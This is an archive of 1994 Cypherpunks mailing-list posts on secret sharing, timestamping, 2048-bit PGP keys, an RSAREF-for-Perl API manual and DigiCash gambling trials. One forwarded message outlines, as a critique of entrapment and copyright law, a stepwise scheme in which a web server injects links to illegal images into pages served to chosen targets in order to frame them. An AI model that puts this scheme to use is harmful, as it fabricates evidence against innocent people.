This is very exciting! Could you show some examples of how your code would be used with Perl? Some kind of script that could work with MP numbers or RSA decrypt a file? It would be very good to have a prototyping language like Perl with crypto addons.
>Code for secret sharing is available, but most secret-sharing algorithms
>create shadows each the size of the message. This can be avoided: use an
>error correcting code to add enough information to the original so the
>message can be recreated with any m of n pieces. Break into pieces, encrypt
>each piece, and secret-share the key. Where can I get an error correction
>algorithm that can do this? You should be able to increase a file's size by
>50% and then have any two of three pieces recreate it, for example.

Try looking for a package called Shade using Archie. Here is an excerpt from the doc file:

> `shade' is a file splitting and merging utility. It takes a large
> file and splits it into uniformly sized blocks. It can also output
> extra blocks (called shadows). These shadows can be used to recover
> missing sections if they get corrupted or if they are lost. With a
> single shadow, `shade' can recover ANY single missing block. As many
> shadows are needed as there are blocks missing. If too few blocks
> and shadows are available, nothing can be recovered.
>
> For example, foo.bar (259042 bytes) is split into 5 sections
> of 45000 bytes, 1 section of 34042 bytes and 2 shadows of
> 45000 bytes. Each of these 8 parts is sent through email.
> Even if any two of these eight parts gets lost, the original
> foo.bar can be reconstructed.
>
> `shade' is a simple application of the Chinese remainder theorem
> for polynomials with coefficients modulo two. For more information
> see the comments at the beginning of project.c.

As for the remailer return address idea, I would suggest looking at Chaum's 1981 paper from CACM which has a similar concept. I believe it was posted here recently. Instead of using shared secrets he had the secret key at each hop get embedded in the return address itself.
Hal

From Tony.Gurnick at nzdairy.co.nz Sun Dec 4 12:19:07 1994
From: Tony.Gurnick at nzdairy.co.nz (DNA)
Date: Sun, 4 Dec 94 12:19:07 PST
Subject: Timestamping
Message-ID: <94120509115477@nzdairy.co.nz>

Could the cypher punks automatic signing also be used as a distributed timestamping service? Where you send a hash/document to it and it timestamps and signs it, to the fact that this hash was in existence at the specified time. Then it would forward your message on to another such service picked at random until the hash has been stamped the number of times you specified.

If you collect a number of timestamps from around the world you could make a case for a document existing at a certain time. You could also back & forward link in time to other documents that each timestamp service has stamped!

Any comments????

T

From rarachel at photon.poly.edu Sun Dec 4 12:28:37 1994
From: rarachel at photon.poly.edu (Arsen Ray Arachelian)
Date: Sun, 4 Dec 94 12:28:37 PST
Subject: Censorship In Cyberspace 1/6
In-Reply-To: <199411302117.AA30877@ideath.goldenbear.com>
Message-ID: <9412042031.AA05235@photon.poly.edu>

> >The Moderator:
> >John Kennedy Taylor is the author of "Reclaiming the Mainstream:
>  ^^^^
> Shouldn't this be "Joan"?

Yep, it should in fact be Joan. I didn't take the time to go over this before posting it to the list. :-) I'm sure there are other errors.

From cactus at seabsd.hks.net Sun Dec 4 12:38:34 1994
From: cactus at seabsd.hks.net (L. Todd Masco)
Date: Sun, 4 Dec 94 12:38:34 PST
Subject: Timestamping
Message-ID: <199412042043.PAA23441@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article <94120509115477 at nzdairy.co.nz>, DNA wrote:
>Could the cypher punks automatic signing
>also be used as a distributed timestamping service?

Absolutely. That was one of my financial motivations for writing the code, and why the "Gratis" is mentioned in the comment. As is, I don't think there's a market available for it yet...
but having the code is a good hedge, as is the increased awareness that it's a possible use of digital signatures.

- --
Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood
cactus at hks.net | Now chemical bonds alone guard our blond(e)s,
cactus at bb.com | And even the plumbing looks good." - B Fuller
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From skaplin at skypoint.com Sun Dec 4 14:07:40 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Sun, 4 Dec 94 14:07:40 PST
Subject: Date for 2048 bit Keys??
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article , you wrote:

> [BEGIN PGP SIGNED MESSAGE]
> I saw an interesting thread in alt.security.pgp about when PGP v 2.6.2 will
> handle key sizes of up to 2048 bits. Someone speculated that it will take
> effect in the middle of the month (ie after Dec. 15 you type pgp -kg and
> it will give you four choices, the last one of up to 2048 bits).
>
> I wasn't aware that this feature was programmed into this version of PGP. I
> always thought that there was simply going to be another upgrade that would
> allow the larger key sizes.
>
> Can anyone shed some light on this???
>

What I wound up doing was changing my computer's date to 12-25-94 then I generated a key. There is no menu choice for a 2048 bit key, but if you enter 2048 in it works.
It really takes a long time (~20 minutes on a 486dlc 40mhz machine)

Sam

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
- -----END PGP PUBLIC KEY BLOCK-----

==============================================================================
You say you are lying. But if everything you say is a lie, then you are telling the truth. You cannot tell the truth because everything you say is a lie. You lie, you tell the truth ... but you cannot, for you lie.
-- Norman the android, "I, Mudd", stardate 4513.3
==============================================================================
skaplin at skypoint.com                   | "...vidi vici veni" - Overheard
                                        | outside a Roman brothel.
PGP encrypted mail is accepted and      |
preferred.                              | Change is the only constant in the
                                        | Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or |
Finger skaplin at mirage.skypoint.com   | Smile!! Big brother is watching.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From mccoy at io.com Sun Dec 4 14:42:09 1994
From: mccoy at io.com (Jim McCoy)
Date: Sun, 4 Dec 94 14:42:09 PST
Subject: Timestamping
In-Reply-To: <199412042043.PAA23441@bb.hks.net>
Message-ID: <199412042241.QAA06939@pentagon.io.com>

> From: cactus at seabsd.hks.net (L. Todd Masco)

[regarding timestamping and the auto-signing "service"...]

> As is, I don't think there's a market available for it yet... but
> having the code is a good hedge, as is the increased awareness that
> it's a possible use of digital signatures.

One should probably examine Bellcore patents regarding some of the hash chaining before offering something like this as a serious service...

jim

From mccoy at io.com Sun Dec 4 14:47:11 1994
From: mccoy at io.com (Jim McCoy)
Date: Sun, 4 Dec 94 14:47:11 PST
Subject: Brands excluded from digicash beta
In-Reply-To: <199412041555.HAA18642@largo.remailer.net>
Message-ID: <199412042247.QAA07327@pentagon.io.com>

> From: eric at remailer.net (Eric Hughes)
>
>    From: Alex Strasheim
>
>    Unless Digicash has significant problems with banks or governments that I
>    don't know about (always a possibility),
>
> I have a simple rule of publicity here. If there were a bank who had
> already agreed to back ecash, would it not already have been
> announced? Since no announcement of the sort has been forthcoming, I
> conclude that the probability that such a backer exists right now is
> low.
Unless said bank wanted to set up the necessary infrastructure and possibly work in back ends to home-banking software and other pieces that make such a system usable for "real people." In all likelihood your conclusion is most likely erroneous.

jim

From nobody at jpunix.com Sun Dec 4 15:07:44 1994
From: nobody at jpunix.com (Anonymous)
Date: Sun, 4 Dec 94 15:07:44 PST
Subject: gambling machines
Message-ID: <199412042307.RAA04560@jpunix.com>

Has the list ever discussed online gambling? I'm curious if anyone's ever tried to combine something like magic money with something like a simulation of a slot machine, using a coin-toss type protocol to ensure the machine isn't rigged.

From cactus at hks.net Sun Dec 4 15:14:54 1994
From: cactus at hks.net (L. Todd Masco)
Date: Sun, 4 Dec 94 15:14:54 PST
Subject: Timestamping
Message-ID: <199412042319.SAA24704@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Jim McCoy writes:
> > From: cactus at seabsd.hks.net (L. Todd Masco)
> [regarding timestamping and the auto-signing "service"...]

I detect a note of skepticism.

> One should probably examine Bellcore patents regarding some of the hash
> chaining before offering something like this as a serious service...

Good point, though it would seem that hash chaining would be unnecessary.

- --
Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood
cactus at hks.net | Now chemical bonds alone guard our blond(e)s,
cactus at bb.com | And even the plumbing looks good." - B Fuller
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From anonymous-remailer at shell.portal.com Sun Dec 4 15:31:37 1994
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sun, 4 Dec 94 15:31:37 PST
Subject: 2048-bit keys??
Message-ID: <199412042331.PAA14197@jobe.shell.portal.com>

just curious, how many random bytes does it take to generate these fuckers and can the keyservers out there handle em yet?

From mccoy at io.com Sun Dec 4 15:31:47 1994
From: mccoy at io.com (Jim McCoy)
Date: Sun, 4 Dec 94 15:31:47 PST
Subject: gambling machines
In-Reply-To: <199412042307.RAA04560@jpunix.com>
Message-ID: <199412042331.RAA10196@pentagon.io.com>

> Has the list ever discussed online gambling? I'm curious if anyone's
> ever tried to combine something like magic money with something like a
> simulation of a slot machine, using a coin-toss type protocol to ensure
> the machine isn't rigged.

For people with beta digicash clients, try http://gamezone.io.com/

As far as a real system goes, you will never see one running on a machine in the US in the near future; in addition to the regulatory BS involved in making magic money useful you would run into all kinds of wonderful gambling laws and regulation.
jim

From alano at teleport.com Sun Dec 4 15:38:00 1994
From: alano at teleport.com (Alan Olsen)
Date: Sun, 4 Dec 94 15:38:00 PST
Subject: future entrapment
Message-ID: <199412042337.PAA01281@desiree.teleport.com>

>From: Mklprc at aol.com
>Date: Sun, 4 Dec 1994 09:26:11 -0500
>To: scottr at hevanet.com
>Cc: alano at teleport.com, brew at mtek.com, GERICKS971 at aol.com,
> 74710.3505 at compuserve.com, furseor1 at hr.house.gov
>Subject: future entrapment
>
>Something to think about...(fwd)
>
>Thought you all might be interested in this excerpt from CPSR list regarding
>copyrights on the Net and especially how police can use the Web to set up
>stings.
>
>mp
>
>
>------------------------------
>
>Date: Thu, 1 Dec 1994 07:45:31 -0800
>From: Charlie Stross (by way of marsha-w at uiuc.edu
>To: cpsr-global at cpsr.org
>
>Philosophically, I see most journalists as being filters. Some of us
>read press releases, strip out the propaganda, and supply the results
>(with interpretation) to the public. Some of us go and try to nail
>down the story by poking around and asking questions. But ultimately
>we rely on sensory input at some level -- and all we do is rearrange
>it, comment on it (by referring to prior input), and punt it out again
>at our readers. This is fundamentally an editorial process, and there
>will be more need for it -- not less -- as the information deluge
>gathers momentum.
>
>There's a huge problem on the net: how does copyright apply to a reference?
>For example: I can't stitch a Far Side cartoon into my WWW home page. But
>I _can_ embed an directive in my page, pointing to a Far
>Side cartoon that is _legitimately_ stored somewhere else on the net. When
>you look at my page you will see the cartoon ... and will have a bit of a
>headache when you stop to think about the copyright implications.
>
>The precise question of what constitutes a copyright violation runs
>into a wall of mud as soon as you start asking questions about sources
>and hyperlinks. For example, here's the kind of havoc you can wreak by
>classifying all embedded link dereferences as deliberate actions.
>Suppose I am a cop in some redneck area, and I want to nail someone
>who uses the net locally. I could run a _very_ neat entrapment sting
>to nail people for possession of kiddie porn:
>
>* establish a local WWW server hosting some useful information
>* configure the server to record the IP addresses of people who
>  access it, and cross-reference them to obtain geographical
>  locations as registered with NIC. Feed this into a GIS and
>  track local accesses.
>* have a list of people who I want to nail.
>* filter all HTTP requests through a script that
>  - checks the list of victims
>  - if a request for a file comes in from one of the
>    targets, munge the outgoing web page to include
>    a tag pointing to a foreign site
>    carrying images deemed pornographic in my jurisdiction
>  - ring the console bell
>
>As soon as someone on the hit list downloads a file, you have prima
>facie evidence that they are probably in possession of some kiddie porn.
>Instant search warrant time ...
>
>(And in case you were wondering, this is just a technology twist on top
>of the recent Adult Action BBS case in Mississippi.)
>
>Basically, as far as I can see, conventional notions of copyright are
>going to have to change -- because copying is no longer the only mechanism
>for gaining possession of information. Our notions of intellectual property
>may also have to change ...
>
>
>-- Charlie
>
>(Who happens to write a column in Online World, and who can be found
>most months in Computer Shopper and some months in PC PLUS -- all three
>of them UK-based magazines unrelated to any US titles of the same name.)
>-------------------------------------------------------------------------
>
>
>++M++++I++++C++++H++++A++++E++++L++++++P+++++E+++++A+++++R+++++C+++++E++++
>| mklprc at aol.com | Knowledge for the pupil -er- people. |
>| mklprc at teleport.com | Give them a light and they'll |
>| "annoying Xists since 1966" | follow it anywhere! -- Firesign |
>+++Y+O+U'D++P+A+Y++T+O++K+N+O+W++W+H+A+T++Y+O+U++R+E+A+L+L+Y++T+H+I+N+K+++
>
>
>
| "Encryption ROT13s your mind."                  | alano at teleport.com |
|"Would you rather be tortured by the government  | Disclaimer:         |
|forces or the people's liberation army?" -mklprc | Ignore the man      |
| -- PGP 2.6.2 key available on request --        | behind the keyboard.|

From MIKEINGLE at delphi.com Sun Dec 4 15:54:26 1994
From: MIKEINGLE at delphi.com (Mike Ingle)
Date: Sun, 4 Dec 94 15:54:26 PST
Subject: Remailers, RSAREF for PERL
Message-ID: <01HK987PYP1U90PJ4I@delphi.com>

I've received a couple of requests for information about the RSAREF-Perl interface. Yes, I do intend to release it, and it follows the RSAREF interface so there is no patent problem involved. It calls the DES library directly, but RSA says they have no problem with that. I'm currently waiting to hear if it is okay to call the random-number generator, so I can provide a "get random bytes" function. When I find this out, and integrate the "shade" program mentioned below, I will release it officially. I can send out Beta versions now to people who really want to test it, and will give me feedback on how it works. You need a Unix machine (no root required), a copy of RSAREF 2.0, a copy of Perl 4, and a classic or gcc compiler.

Hal Finney writes:

>[Part about remailers deleted]

Deleted? That was my main point! What do you think of this remailer design?

>>For something complex like this, we need a language with a little more
>>leverage than C provides. For this and other complex protocols, I've ported
>>RSAREF 2.0 to Perl. The interface does not require you to recompile Perl.
>>It uses a C daemon and pipes. It provides symmetric encryption, public-key
>>encryption, digital signatures, hashing, DH exchange, and ASCII armor.
>>The algorithms used are MD5, MD2, DES, DESX, triple-DES, RSA, and DH.
>>It has a good (eval/die) exception handling mechanism, and a very thorough >>regression testing script. >>[...] >>I want to add other algorithms to the Perl encryption package. The secret >>sharing, for one. A one-function call to gzip for compression. A blind >>signature if I could get patent permission (not from Chaum; how's Brands?) >>or perhaps just do it with a "research purposes only" disclaimer. Someone >>with Visual Basic experience could do a DOS/Windows VBX module to enable >>easy writing of PC clients for neat net-based servers written with the Perl >>encryption package. >This is very exciting! Could you show some examples of how your code >would be used with Perl? Some kind of script that could work with MP >numbers or RSA decrypt a file? It would be very good to have a >prototyping language like Perl with crypto addons. I put some examples from the manual at the end of this message, as they are fairly long compared to the rest of the message. Essentially it does everything documented in "rsaref.txt". >>Code for secret sharing is available, but most secret-sharing algorithms >>create shadows each the size of the message. This can be avoided: use an >>error correcting code to add enough information to the original so the >>message can be recreated with any m of n pieces. Break into pieces, encrypt >>each piece, and secret-share the key. Where can I get an error correction >>algorithm that can do this? You should be able to increase a file's size by >>50% and then have any two of three pieces recreate it, for example. >Try looking for a package called Shade using Archie. Here is an excerpt >from the doc file: >>`shade' is a file splitting and merging utility. It takes a large >>file and splits it into uniformly sized blocks. It can also output >>extra blocks (called shadows). These shadows can be used to recover >>missing sections if they get corrupted or it they are lost. With a >>single shadow, `shade' can recover ANY single missing block. 
>>As many shadows are needed as there are blocks missing. If too few blocks
>>and shadows are available, nothing can be recovered.
>>
>>For example, foo.bar (259042 bytes) is split into 5 sections
>>of 45000 bytes, 1 section of 34042 bytes and 2 shadows of
>>45000 bytes. Each of these 8 parts is sent through email.
>>Even if any two of these eight parts get lost, the original
>>foo.bar can be reconstructed.
>>
>>`shade' is a simple application of the Chinese remainder theorem
>>for polynomials with coefficients modulo two. For more information
>>see the comments at the beginning of project.c.

Ok, I will get this file. Looks like what I wanted.

>As for the remailer return address idea, I would suggest looking at
>Chaum's 1981 paper from CACM which has a similar concept. I believe it
>was posted here recently. Instead of using shared secrets he had the
>secret key at each hop get embedded in the return address itself.

My database system (grep) picked up the article, posted Oct 14 anonymously.
Looks like Chaum just has the remailer keep track of sent messages and
refuse to process them again. This does not protect you if the remailer is
coerced or hacked. There is still enough persistent information available
to catch you. Is there a good way to establish a shared secret untraceably?

----

Applying a chainsaw to the RSAREF for Perl user manual:

You have two files: rsaref.pl and rsarefd. Rsarefd is a C program, and
rsaref.pl is a perl package you "require" to use it.

...

The functions available are:

Message digest (secure hashing) algorithms MD5 and MD2
Symmetric encryption algorithms DES, DESX, and Triple-DES in CBC mode
ASCII encoding and decoding of binary strings according to RFC 1421
Public-key encryption with RSA and DES, DESX, or Triple-DES in CBC mode
Digital signatures with RSA and MD5 or MD2
Generation of RSA keys (up to 1024 bits) for the above
Diffie-Hellman key agreement (up to 1024 bits)
Generation of Diffie-Hellman parameters for the above

...
The included Perl script "rsaref_test" will test all of the interface
functions, and generate all of the exceptions to make sure they are handled
correctly. It also checks the daemon for memory leaks. If rsarefd has been
compiled in the current directory and rsaref.pl is available, running
"rsaref_test" should run it.

...

Exception handling is done with the Perl eval/die mechanism. The individual
error codes are listed along with the function descriptions. The error code
will be returned in $@ as an ASCII string if the eval fails.

...

require 'rsaref.pl';

&rsaref'start_daemon($daemon_location); # starts rsarefd

&rsaref'end_daemon; # ends rsarefd

$digest=&rsaref'digest($data,$digestAlgorithm); # take a message digest

$digestAlgorithm is one of the defined constants "$rsaref'DA_MD2" or
"$rsaref'DA_MD5". An "RE_DIGEST_ALGORITHM" will be raised if
$digestAlgorithm is invalid.

$output=&rsaref'cipher($input,$key,$iv,$function,$algorithm);

Encrypts or decrypts a string using a symmetric encryption algorithm.
$function is one of "$rsaref'CM_ENCRYPT" or "$rsaref'CM_DECRYPT".
$algorithm is one of $rsaref'EA_DES_CBC, $rsaref'EA_DESX_CBC,
$rsaref'EA_DES_EDE3_CBC or $rsaref'EA_DES_EDE2_CBC. If $algorithm or
$function is invalid, the function raises an "RE_ENCRYPTION_ALGORITHM"
exception. If $key is larger than 24 bytes or $iv is not 8 bytes long,
the function raises a "RE_KEY" exception.

$asciiText=&rsaref'encodePEMblock($binaryData);
$binaryData=&rsaref'decodePEMblock($asciiText);

These two functions are used to move binary data, such as ciphertext and
keys, via Email and other non-eight-bit-clean channels. They are similar to
(but not compatible with) uuencode. The method is detailed in RFC 1421.
encodePEMblock does not raise any exceptions. decodePEMblock will raise an
"RE_ENCODING" if the input is invalid.
$bytes=&rsaref'getRandomBytesNeeded;
&rsaref'randomUpdate($randomBytes); # setup random numbers

@private_key=&rsaref'generatePEMkeys($bits,$useFermat4);
@public_key=@private_key[0..2];

This function is used to generate RSA public and private keys for digital
signatures and public-key encryption ("envelopes" or "sealing".) $bits
specifies the key length from 508 to 1024 bits. $useFermat4 chooses the
public exponent; if it is 0, the exponent is 3; if it is 1, the exponent is
65537. The returned @private_key is actually:

($bits,$modulus,$publicExponent,$privateExponent,$prime1,$prime2,
$primeExponent1,$primeExponent2,$coefficient)

By taking only the first three, you get a public key:

($bits,$modulus,$publicExponent)

This function raises an "RE_NEED_RANDOM" if you did not initialize the
random-number generator. If your key length is out of range, it raises an
"RE_MODULUS_LEN" exception.

$signature=&rsaref'sign($data,$digestAlgorithm,@privateKey);

This function raises an "RE_DIGEST_ALGORITHM" exception if $digestAlgorithm
is invalid, or an "RE_PRIVATE_KEY" if @private_key is invalid.

&rsaref'verify($data,$digestAlgorithm,$signature,@publicKey);

Verify returns no value. If it completes successfully, the signature is
valid. If the signature is invalid, Verify raises an "RE_SIGNATURE"
exception. Verify returns an "RE_LEN" if the signature is the wrong length,
and an "RE_PUBLIC_KEY" if the public key cannot decrypt the signature. This
means the public key or the signature is corrupted.

($encryptedMessage,$iv,@encryptedKeys)=
&rsaref'seal($message,$encryptionAlgorithm,@publicKeys);

This function seals (public-key encrypts) a message. The same message can
be encrypted for multiple recipients. The message is only encrypted once;
then the session key is encrypted with each recipient's public key.
@publicKeys are one or more public keys. For each public key you provide,
you will get back one encryptedKey.
Each encryptedKey can decrypt the message using the private key
corresponding to the public key used to encrypt it. Seal raises an
"RE_ENCRYPTION_ALGORITHM" exception if $encryptionAlgorithm is invalid, an
"RE_PUBLIC_KEY" if the public key is invalid, and an "RE_NEED_RANDOM" if
the random-number generator is not initialized.

$message=&rsaref'open($encryptedMessage,$iv,$encryptionAlgorithm,
$encryptedKey,@privateKey);

This function opens (decrypts) a sealed message using a private key.
$encryptedMessage is the output from the seal operation. Open raises an
RE_LEN exception if the encryptedKey size is out of range,
RE_ENCRYPTION_ALGORITHM if the encryptionAlgorithm is invalid,
RE_PRIVATE_KEY if the private key cannot decrypt the encryptedKey, and
RE_KEY if the symmetric key cannot decrypt the message.

($prime,$generator)=
&rsaref'generateDHparams($primeBits,$subPrimeBits);

This function generates a new prime and generator for Diffie-Hellman
exchange. $primeBits is the length of the DH modulus (prime), and
$subPrimeBits is the order of the generator. $subPrimeBits can be somewhat
smaller than $primeBits without compromising security, and this makes the
exchange go faster. The dhdemo included with RSAREF uses a 512-bit prime
and 160-bit subprime, for example. The function returns RE_MODULUS_LEN if
the prime length is invalid, and RE_NEED_RANDOM if the random generator is
not initialized.

($publicValue,$privateValue)=
&rsaref'setupDHagreement($prime,$generator,$privateValueLen);

This function raises an RE_NEED_RANDOM exception if the random number
generator is not initialized.

$agreedKey=&rsaref'computeDHagreedKey($prime,$generator,
$privateValue,$otherPublicValue);

This function raises an RE_DATA exception if the otherPublicValue is longer
than the prime.

From jamesd at netcom.com Sun Dec 4 15:56:09 1994
From: jamesd at netcom.com (James A.
Donald) Date: Sun, 4 Dec 94 15:56:09 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412040223.UAA00225@omaha.omaha.com> Message-ID: <199412042340.PAA23394@netcom8.netcom.com> Alex Strasheim writes > Unless Digicash has significant problems with banks or governments that I > don't know about (always a possibility), the things I've heard about the > beta test make me believe that a functional transaction system from that > company will probably be released. It seems that some bankers are pissed at Digicash, for reasons very similar to the reasons that some cypherpunks are pissed at Digicash. As I said earlier, ninety percent of success is turning up. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at acm.org From rah at shipwright.com Sun Dec 4 16:01:57 1994 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 4 Dec 94 16:01:57 PST Subject: e$ spam: Announcing availability of NetCheque Message-ID: <199412050001.TAA09886@zork.tiac.net> I remember c'punks laughing about the last Kerberos-based transaction I heard about, the Gopher billing server at CMU, but I can't remember why... Cheers, Bob Hettinga >From: bcn at ISI.EDU >Date: Sat, 3 Dec 1994 17:20:03 -0800 >Posted-Date: Sat, 3 Dec 1994 17:20:03 -0800 >Original-From: Clifford Neuman >To: www-buyinfo at allegra.att.com, kerberos at mit.edu >Subject: Announcing availability of NetCheque >X-UIDL: 786585323.000 > >NetCheque(TM) is an electronic payment system for the Internet >developed at the Information Sciences Institute of the University of >Southern California. Users registered with NetCheque accounting >servers are able to write checks to other users. When deposited, the >check authorize the transfer of funds from one account to another. 
>NetCheque uses Kerberos to protect electronic checks. > >A binary NetCheque release is available for Sun4 systems running SunOS. >A source release, and binary releases for other architectures will be >available within several weeks. > >To write checks or deposit checks you will require a a NetCheque >account. Eventually, there will be many accounting servers from which >you can obtain an account, but in the early stages of the trial, there >is only one. You must fill out the account application, which may be >obtained by sending an e-mail request to NetCheque at isi.edu. > >Though we can grant NetCheque accounts to anyone that requests one, >because the software uses encryption to protect the checks we regret >that we will not be able to send the software itself to users outside >the United States. Users in the United States may retrieve the >software from prospero.isi.edu in the directory /pub/netcheque/distribution. > >Additional information on NetCheque can be found through our home >page: > > http://nii-server.isi.edu/info/NetCheque/ > >Payments using NetCheque originate from named user accounts, providing >no anonymity. We are also working on an electronic currency system >called NetCash to support weakly anonymous payments. The NetCash >system was described in a paper in the 1993 ACM Conference on Computer >and Communications security, available through our home page. > >Clifford Neuman >Gennady (Ari) Medvinsky > > ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From warlord at MIT.EDU Sun Dec 4 16:04:09 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Sun, 4 Dec 94 16:04:09 PST Subject: 2048-bit keys?? 
In-Reply-To: <199412042331.PAA14197@jobe.shell.portal.com> Message-ID: <9412050004.AA21905@pickled-herring.MIT.EDU> > just curious, how many random bytes does it take to generate these > fuckers and can the keyservers out their handle em yet? Well, it needs about 2048 bits of randomness, I would guess. It depends on how many bits/keystroke you can get on your machine... As for the keyservers, well, I know that mine (pgp.mit.edu) can. I should let you know that there is a small buglet in PGP 2.6.2 that will not allow you to generate 2048-bit keys. It limits you to 2047 bits (there is a piece of code that leaves that one extra bit up there -- oops). This shouldn't affect anything, except people will only get 2047 bits instead of 2048, but I personally do not consider this a problem. -derek From M.Gream at uts.EDU.AU Sun Dec 4 16:42:55 1994 From: M.Gream at uts.EDU.AU (Matthew Gream) Date: Sun, 4 Dec 94 16:42:55 PST Subject: gambling machines In-Reply-To: <199412042331.RAA10196@pentagon.io.com> Message-ID: <199412050040.AA03362@sequoia.itd.uts.EDU.AU> `Jim McCoy' wrote: > > For people with beta digicash clients, try http://gamezone.io.com/ > > IAs far as a real system goes, you will never see on running on a machine > in the US in the near future; in addition to the regulatory BS involved in > making magic money useful you would run into all kinds of wonderful > gambling laws and regulation. > To exercise my ecash software I had a few goes at this and found at least one problem; payments not honoured. In ten games I obtained two four of a kinds, the first on a 0.25 bet which should have resulted in a payment of 6.25. No payment as received. The second time it was on a wager of 1.00, --> You have won! Your final hand was a Four of a Kind. The winnings for this hand was $25. This sum is being deposited in your CyberWallet right now. <-- again --- no payment received. 
Admittedly, four other small payments succeeded, with values of less than and equal to 2.00 (for two of a kinds and so on). I assume this is caused by some kind of bug, not any deception on behalf of the operator; but it does illustrate a potential problem as I really don't have any `proof' with which to challenge. Not that I'm worried; it being a beta and all that. But one would expect a `real' system to provide better assurances (wrt. payments being honoured and guaranteed rates of return). Clearly we're experimenting here. mg. -- Matthew Gream (sw/hw engineer) +61 (02) 821-2043 From werewolf at io.org Sun Dec 4 16:46:45 1994 From: werewolf at io.org (Mark Terka) Date: Sun, 4 Dec 94 16:46:45 PST Subject: 2048-bit keys?? In-Reply-To: <199412042331.PAA14197@jobe.shell.portal.com> Message-ID: On Sun, 4 Dec 1994 anonymous-remailer at shell.portal.com wrote: > just curious, how many random bytes does it take to generate these > fuckers and can the keyservers out their handle em yet? > Well, when I generated my key today, it asked for 1115 random keystrokes and the overall generation took a good 20-25 minutes on my 486-33. As for the keyservers, I'm not sure why they wouldn't handle them. After all, I had a non-standard key before and they handled that, back in the v 2.3a days.
-------------------------------------------------------------------------- Mark Terka | werewolf at io.org | public key (werewolf) by Toronto,Canada | dg507 at cleveland.freenet.edu | public key server or request --------------------------------------------------------------------------- From db at Tadpole.COM Sun Dec 4 17:18:03 1994 From: db at Tadpole.COM (Doug Barnes) Date: Sun, 4 Dec 94 17:18:03 PST Subject: gambling machines In-Reply-To: <199412050040.AA03362@sequoia.itd.uts.EDU.AU> Message-ID: <9412050117.AA15654@tadpole> The underlying problem is that in the DigiCash system money goes through the shop into the bank, but there is currently no automatic way for a shop to withdraw money (we might be able to hack one on top of the text client, but haven't gotten around to it). So, what happens, is that the shop runs out of cash (or out of the right size coins), even though it has a good-size bank balance. We've been trying to stay "cashed up", but interest in the poker game has been sporadic. You are absolutely correct that various steps would need to be taken in terms of error handling and dispute resolution if the e-cash was out of beta. We are currently nicely cashed up, please try it again and see if it is still not paying out (I'm stuck in a text-only environment at the moment.) Please send any error reports to me at: dab at tadpole.com > > To exercise my ecash software I had a few goes at this and found at > least one problem; payments not honoured. In ten games I obtained two > four of a kinds, the first on a 0.25 bet which should have resulted in > a payment of 6.25. No payment as received. The second time it was on a > wager of 1.00, > > --> > You have won! > > Your final hand was a Four of a Kind. The winnings for this hand was > $25. This sum is being deposited in your CyberWallet right now. > <-- > > again --- no payment received. 
Admittedly, four other small payments > succeeded, with values of less than and equal to 2.00 (for two of a > kinds and so on). I assume this is caused by some kind of bug, not any > deception on behalf of the operator; but it does illustrate a potental > problem as I really don't have any `proof' with which to challenge. > > Not that I'm worried; it being a beta and all that. But one would > expect a `real' system to provide better assurances (wrt. payments > being honoured and guaranteed rates of return). Clearly we're > experimenting here. > > From mccoy at io.com Sun Dec 4 17:24:55 1994 From: mccoy at io.com (Jim McCoy) Date: Sun, 4 Dec 94 17:24:55 PST Subject: gambling machines In-Reply-To: <199412050040.AA03362@sequoia.itd.uts.EDU.AU> Message-ID: <199412050124.TAA20338@pentagon.io.com> > From: M.Gream at uts.EDU.AU (Matthew Gream) > > `Jim McCoy' wrote: [regarding online gambling] > > For people with beta digicash clients, try http://gamezone.io.com/ > > To exercise my ecash software I had a few goes at this and found at > least one problem; payments not honoured. [...winning hands not paying > out...] Admittedly, four other small payments > succeeded, with values of less than and equal to 2.00 (for two of a > kinds and so on). This is basically caused by the lack of a to-be-implemented-RSN (tm) part of the ecash server: the ability to have have a merchant "wallet" maintain a set balance of coins in the wallet. What happens is that every time money is given to the merchant to play a game it gets directly deposited into the bank, payoffs for winning hands come out of the wallet. Eventually the wallet runs out of coins to make the payment but there is no automatic way to keep it supplied from the coins that are deposited to play. The DigiCash user clients seem fairly well developed, but they are lagging behind on the server-side of things (both merchant servers, and the bank server.) 
> I assume this is caused by some kind of bug, not any > deception on behalf of the operator; but it does illustrate a potental > problem as I really don't have any `proof' with which to challenge. Well, at some point we need to finish up some of the reliability code. It should present you with a "receipt" number during payoff that will be linked to the game database, the game is not removed from the database until the money exchange clears so if there is a problem the user can present the number and we can look up the game results. jim From skaplin at skypoint.com Sun Dec 4 18:42:26 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Sun, 4 Dec 94 18:42:26 PST Subject: Well now that we're signing... Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Well folks, now that more people are signing messages, how about every once and a while posting your key? It's kind of a drag having to hit the keyservers. Sam ============================================================================== A Vulcan can no sooner be disloyal than he can exist without breathing.
